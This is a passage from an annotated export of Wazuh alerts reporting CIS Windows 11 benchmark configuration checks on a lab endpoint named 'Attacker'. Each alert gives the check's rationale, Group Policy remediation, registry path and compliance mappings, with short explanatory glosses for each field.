Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26292
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Users could see the list of administrator accounts, making it slightly easier for a malicious user who has logged onto a console session to try to crack the passwords of those accounts.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Enumerate administrator accounts on elevation. Note: This Group Policy path is provided by the Group Policy template CredUI.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.16.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.2.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\CredUI']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.692+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.692+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.16.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2524241
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26293
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether security questions can be used to reset local account passwords. The security question feature does not apply to domain accounts, only local accounts on the workstation. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Users could establish security questions that are easily guessed or sleuthed by observing the user’s social media accounts, making it easier for a malicious actor to change the local user account password and gain access to the computer as that user account.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Prevent the use of security questions for local accounts. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 10 Release 1903 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.16.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.705+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.705+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.1']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2527712
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26294
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the amount of diagnostic and usage data reported to Microsoft: - A value of (0) Diagnostic data off (not recommended). Using this value, no diagnostic data is sent from the device. This value is only supported on Enterprise, Education, and Server editions. If you choose this setting, devices in your organization will still be secure. - A value of (1) Send required diagnostic data. This is the minimum diagnostic data necessary to keep Windows secure, up to date, and performing as expected. Using this value disables the Optional diagnostic data control in the Settings app. - A value of (3) Send optional diagnostic data. Additional diagnostic data is collected that helps us to detect, diagnose and fix issues, as well as make product improvements. Required diagnostic data will always be included when you choose to send optional diagnostic data. Optional diagnostic data can also include diagnostic log files and crash dumps. Use the Limit Dump Collection and the Limit Diagnostic Log Collection policies for more granular control of what optional diagnostic data is sent. Windows telemetry settings apply to the Windows operating system and some first party apps. This setting does not apply to third party apps running on Windows 10/11. The recommended state for this setting is: Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data. Note: If your organization relies on Windows Update, the minimum recommended setting is Required diagnostic data. Because no Windows Update information is collected when diagnostic data is off, important information about update failures is not sent. Microsoft uses this information to fix the causes of those failures and improve the quality of updates. Note #2: The Configure diagnostic data opt-in settings user interface group policy can be used to prevent end users from changing their data collection settings. Note #3: Enhanced diagnostic data setting is not available on Windows 11 and Windows Server 2022 and has been replaced with policies that can control the amount of optional diagnostic data that is sent. For more information on these settings visit Manage diagnostic data using Group Policy and MDM.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Allow Diagnostic Data. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 11 Release 21H2 Administrative Templates (or newer). Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Allow Telemetry, but it was renamed to Allow Diagnostic Data starting with the Windows 11 Release 21H2 Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.722+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.722+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.2']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2535875
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26295
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether the Connected User Experience and Telemetry service can automatically use an authenticated proxy to send data back to Microsoft. The recommended state for this setting is: Enabled: Disable Authenticated Proxy usage.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Disable Authenticated Proxy usage: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.738+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.738+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2539776
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26296
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether Windows attempts to connect with the OneSettings service to download configuration settings. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending data to a 3rd party vendor is a security concern and should only be done on an as-needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Disable OneSettings Downloads. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.753+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.753+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.4']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2542714
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26297
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not show feedback notifications' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows an organization to prevent its devices from showing feedback questions from Microsoft. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Users should not be sending any feedback to 3rd party vendors in an enterprise managed environment.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Do not show feedback notifications. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template FeedbackNotifications.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.769+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.769+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.5']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2545987
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: check = the result of one policy check (this record); summary = the per‑scan passed/failed/not‑applicable totals. It does not say how the check was evaluated; that is implied by the registry, command or file fields below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26298
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether Windows records attempts to connect with the OneSettings service to the Operational EventLog. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Enable OneSettings Auditing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.5
CIS benchmark recommendation number as written in the SCA policy file; rule.cis above is copied from here, so the two should agree.

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls safeguard from the policy file (8.5 = Collect Detailed Audit Logs); feeds rule.cis_csc above.

